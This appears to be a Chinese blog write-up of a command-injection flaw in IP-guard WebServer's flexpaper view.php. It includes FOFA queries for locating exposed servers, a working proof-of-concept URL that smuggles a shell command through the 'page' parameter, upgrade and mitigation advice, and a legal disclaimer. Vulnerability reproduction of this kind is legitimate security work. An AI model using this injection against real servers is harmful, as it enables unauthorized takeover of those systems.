IP-guard WebServer 命令执行漏洞复现

简介

IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。

影响版本:IP-guard<4.81.0307.0

漏洞复现

FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"
IP-guard WebServer 命令执行漏洞复现_第1张图片

访问页面如下所示:

IP-guard WebServer 命令执行漏洞复现_第2张图片

POC:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

拼接URL进行get请求:

http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt

IP-guard WebServer 命令执行漏洞复现_第3张图片

从浏览器访问后会直接下载一个文件证明请求成功

访问POC:/ipg/static/appr/lib/flexpaper/php/test.txt

IP-guard WebServer 命令执行漏洞复现_第4张图片

成功执行写入的命令

攻击者可以利用漏洞获取对服务器的控制权

修复建议

1、产品升级方案
官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.81.0307.0及以上。
2、临时缓解措施

  1. 配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。
  2. 如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

你可能感兴趣的:(漏洞复现,安全)